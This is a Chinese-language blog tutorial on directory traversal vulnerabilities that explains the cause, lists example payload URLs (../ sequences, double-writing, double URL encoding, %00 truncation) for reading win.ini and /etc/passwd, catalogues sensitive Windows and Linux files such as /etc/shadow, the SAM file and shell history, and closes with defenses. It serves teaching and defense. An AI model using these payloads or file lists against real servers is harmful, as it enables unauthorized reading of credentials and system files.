目录遍历漏洞

最新推荐文章于 2023-10-02 09:23:20 发布
最新推荐文章于 2023-10-02 09:23:20 发布
阅读量4.5k 收藏 7
点赞数
文章标签: 服务器 windows 网络 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45095113/article/details/127862713
版权

目录遍历 安全漏洞 攻击手法 防御措施 文件路径
关键词由CSDN通过智能技术生成

一、前言

目录遍历(路径遍历)是由于Web服务器或者Web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,是针对Windows IIS和 Apache 的一种常见攻击。使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以是Web根目录以外的文件即受限文件),甚至执行系统命令 cmd.exe /c 提取目录信息或在Web服务器的根目录外执行命令。该漏洞常常出现在文件读取或者展示图片等对文件读取交互的功能块。

二、原理

目录遍历是一种允许攻击者在未授权的状态下读取应用服务上任意文件的安全漏洞。这包括应用代码、数据、凭证以及操作系统的敏感文件。在有些情况下,攻击者还可能对服务器里的文件进行任意写入,更改应用数据甚至完全控制服务器。

程序在实现上没有充分过滤用户输入的目录跳转符(如../),导致用户可以恶意提交目录跳转,实现服务器上的任意文件遍历。

三、攻击手法

比如:http://www.test.com/index.php?file=image1.jpg,服务器拼接成c://test/static/imgs/image1.jpg

1、直接使用../

payload:
http://www.test.com/index.php?file=../imgs/image1.jpg
http://www.test.com/index.php?file=../../../../windows/win.ini
http://www.test.com/index.php?file=../../../../windows/win.ini%00.jpg

2、使用绝对路径

payload:
http://www.test.com/index.php?file=/etc/passwd
http://www.test.com/index.php?file=/etc/passwd%00.jpg

3、使用双写

payload:
http://www.test.com/index.php?file=....//imgs/image1.jpg
http://www.test.com/index.php?file=....//....//....//....//windows/win.ini
http://www.test.com/index.php?file=....//....//....//....//windows/win.ini%00.jpg

4、加密参数

http://www.test.com/index.php?file=aW1hZ2UxLmpwZw== 参数file的数据采用Base64加密,而攻击中只需要将数据进行相应的解密即可入侵,采用一些常见、规律性的加密方式也是不安全的。

5、二次编码

采用不同的编码进行过滤型绕过,比如通过对参数进行url编码提交来绕过。 . : %2          / : %2f           %:%25(双重编码) 注意:服务器会先进行url解码,再加上get协议本身会进行一次url解码,所以进行两次url编码

6、截断绕过

当程序系统设置了后缀名检测的时候,可以通过"%00"截断来绕过。 比如:../windows/win.ini%00.jpg等价于../windows/win.ini;在Unix的系统中也可以使用Url编码的换行符%0a,也可以尝试%20。

四、常见系统文件路径

Windows:

C:\boot.ini //查看系统版本

C:\Windows\System32\inetsrv\MetaBase.xml           //IIS配置文件

C:\Windows\repair\sam                                             //存储系统初次安装的密码

C:\Program Files\mysql\my.ini                                   //Mysql配置

C:\Program Files\mysql\data\mysql\user.MYD         //Mysql root

C:\Windows\php.ini                                                   //php配置信息

C:\Windows\my.ini                                                    //Mysql配置信息

Linux:

/etc/passwd                                  #查看用户文件

/etc/shadow                                 #查看密码文件,如果能读取该文件说明是root权限

/etc/httpd/conf/httpd.conf          #查看apache的配置文件

/root/.bash_history                       #查看历史命令

/var/lib/mlocate/mlocate.db         #本地所有文件信息

/etc/ssh/sshd_config                     #ssh配置文件,如果对外开放可看到端口

/proc/self/fd/fd[0-9]                      *(文件标识符)

/proc/mounts

/root/.ssh/known_hosts

程序配置文件

apache:

/etc/httpd/conf/httpd.conf
/etc/apache2/httpd.conf
/etc/apache2/apache2.conf

nginx:

/etc/nginx/nginx.conf
/usr/local/nginx/conf/nginx.conf
/usr/local/etc/nginx/nginx.conf

redis:

/etc/redis.conf

五、防御措施

1. 限制用户输入的路径在某一个范围内。

2. 标准化所有字符

当用户请求访问文件/目录时,直接标准化所有字符,将所有字符转换成 url 编码,这样做之后,到了服务器手上不会解析成../,就不存在目录遍历了。

3. 验证用户的输入是否在白名单那内

也就是限制用户请求资源,对于少量的文件(例如都是图像),写正则表达式批量规范请求资源的白名单,这样可以做到完美防御目录遍历漏洞。

浪久1
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
目录遍历漏洞原理、解决方案
qq_44005305的博客
03-10 5261
目录遍历(路径遍历)是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器安全限制,访问任意的文件(可以使web目录以外的文件),甚至执行系统命令。
Web 安全之路径遍历攻击详解
最新发布
dzqxwzoe的博客
06-10 807
路径遍历攻击的核心原理在于利用目标系统处理用户输入时的不安全或疏忽行为,尤其是当应用程序接受用户提供的文件名或路径,并据此进行文件操作(如读取、写入或执行文件)时。攻击者会提交精心构造的恶意路径,其中包含了特殊的字符序列或编码,使得原本应该在限定目录下的文件操作跨越了预设边界,进而访问到服务器文件系统的其他位置。
【burpsuite安全练兵场-服务端3】目录遍历漏洞-6个实验(全)
12-30 4226
【BP靶场portswigger-服务端3-目录遍历】6个实验-千文详解步骤
BitTraversal:Burpsuite 插件检测目录遍历漏洞
05-29
该插件使用两种主要技术来识别目录遍历漏洞 检测方法 静电检测 动态检测 i) 使用在中指定的预定义有效,这些将在运行时从 GitHub 获取并与匹配 ii) 仍在开发中。 目的是检测与/static/css/main.css/和/static/../...
信息安全技术:目录遍历漏洞利用.pptx
11-01
《信息安全技术:目录遍历漏洞利用》 在信息安全领域,目录遍历漏洞是一种常见的安全问题,它涉及到Web应用和Web服务器安全性。攻击者利用这种漏洞可以访问到本不应公开的系统文件,甚至可能控制服务器执行恶意...
信息安全技术:目录遍历漏洞防御.pptx
11-01
目录遍历漏洞网络安全领域的一个重要问题,它允许攻击者通过构造特定的URL,绕过正常的访问控制,访问到服务器上的非预期目录,甚至包括敏感文件。这种漏洞通常发生在Web应用程序中,当系统未能正确验证和处理用户...
Zip文件目录遍历漏洞demo
02-28
Zip文件目录遍历漏洞是一种常见的安全问题,主要发生在处理或解析ZIP格式的压缩文件时。在本Demo中,我们将深入探讨这种漏洞的本质、其产生的原因以及如何防范。 ZIP是一种广泛使用的文件压缩格式,它允许用户将多...
信息安全技术:目录遍历漏洞概念.pptx
11-01
目录遍历漏洞详解】 目录遍历漏洞网络安全领域中一个重要的问题,它涉及到网站的配置缺陷和文件访问控制。这种漏洞允许攻击者通过构造特定的URL请求,从而突破正常权限限制,访问到服务器上本应受保护的目录和...
Java代码审计之目录遍历漏洞详解
m0_71745754的博客
01-13 5621
通过用户输入,后端接收到参数直接拼接到指定路径下读取用户的文件名,看似正常,但是用户输入的参数不可控制,黑客将非法的特殊字符作为文件名的一部分,操作到其他路径下,甚至是跳转到服务器敏感目录,读取敏感的配置文件,例如服务器的密码文件,程序数据库,redis等核心配置文件,因此具有一定的风险;
Pikachu靶场——目录遍历漏洞和敏感信息泄露
来日可期的博客
10-02 2247
目录遍历漏洞发生在应用程序未能正确限制用户输入的情况下。攻击者可以利用这个漏洞,通过在请求中使用特殊的文件路径字符(如 ../ 或 %2e%2e/)来绕过应用程序的访问控制机制,访问应用程序所不应该暴露的文件或目录。 敏感信息泄露由于后台人员的疏忽或者不当的设计,导致不应该被前端用户看到的数据被轻易的访问到。
目录穿越/遍历漏洞及对其防御方法的绕过
2301_77004573的博客
04-30 4271
目录穿越(目录遍历)是一个Web安全漏洞,攻击者可以利用该漏洞读取运行应用程序的服务器上的任意文件。这可能包括应用程序代码和数据,后端系统的登录信息以及敏感的操作系统文件。目录穿越不仅可以访问服务器中的任何目录,还可以访问服务器中任何文件的内容。例如,攻击者通过浏览器访问…/…/…/…/…/…/…/…/…/…/…/…/…/…/etc/passwd(此处较多…/),就可以读取Linux服务器目录下的etc目录下的passwd文件的内容。
【路径遍历漏洞】查找、利用、预防
08-20 5854
【路径遍历漏洞】确定攻击目标、探查路径遍历漏洞、避开遍历攻击障碍、处理定制编码、利用遍历漏洞
gitlab目录遍历漏洞
06-01
GitLab目录遍历漏洞是指攻击者可以通过利用GitLab应用程序的漏洞,实现对Git仓库中的文件进行未授权访问和下载,进而获取敏感信息的漏洞。这种漏洞通常是由于GitLab应用程序没有正确的对用户输入进行过滤和验证,导致攻击者可以通过构造特定的请求,绕过GitLab应用程序的访问控制机制,访问和下载Git仓库中的文件。 攻击者可以利用目录遍历漏洞获取Git仓库中的敏感文件,包括代码、配置文件、用户凭证等,从而对系统进行进一步的攻击。为了防止目录遍历漏洞的攻击,GitLab官方建议用户采取以下措施: 1. 及时更新GitLab应用程序版本,确保已经修复了已知的漏洞。 2. 对GitLab应用程序进行安全审计,及时发现和修复可能存在的漏洞。 3. 启用GitLab的访问控制功能,限制用户对Git仓库中的文件的访问权限。 4. 对Git仓库中的敏感文件进行加密或者其他保护措施,确保文件不会被未授权访问。 5. 对GitLab应用程序进行安全加固,如:关闭不必要的服务、减少系统漏洞等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值